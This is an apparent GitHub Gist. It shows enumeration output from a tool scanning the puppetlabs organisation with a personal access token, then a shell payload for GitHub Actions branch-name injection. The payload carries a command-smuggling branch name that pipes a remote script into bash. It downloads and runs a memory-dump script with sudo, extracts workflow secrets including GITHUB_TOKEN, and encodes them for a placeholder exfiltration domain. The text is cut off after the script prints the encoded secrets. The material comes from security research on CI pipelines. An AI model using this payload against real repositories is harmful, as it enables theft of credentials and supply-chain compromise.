Skip to content

Instantly share code, notes, and snippets.

[+] The authenticated user is: RampagingSloth
[+] The GitHub Classic PAT has the following scopes: gist, read:org, repo, workflow
[+] Enumerating the puppetlabs organization!
[!] The user has only public access!
[+] About to enumerate 561 repos within the puppetlabs organization!
[+] Querying and caching workflow YAML files!
[+] Querying 0 out of 6 batches!
[+] Querying 1 out of 6 batches!
[+] Querying 2 out of 6 batches!
[+] Querying 3 out of 6 batches!
@AdnaneKhan
AdnaneKhan / payload.sh
Created November 28, 2023 03:22
Universal "dump all secrets" payload for GitHub workflow branch name injection.
# Replace with Burp collaborator domain or similar.
YOUR_EXFIL="https://your-exfil-domain.com"
# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash'
# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN)
if [[ "$OSTYPE" == "linux-gnu" ]]; then
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0`
# Print to run log
echo $B64_BLOB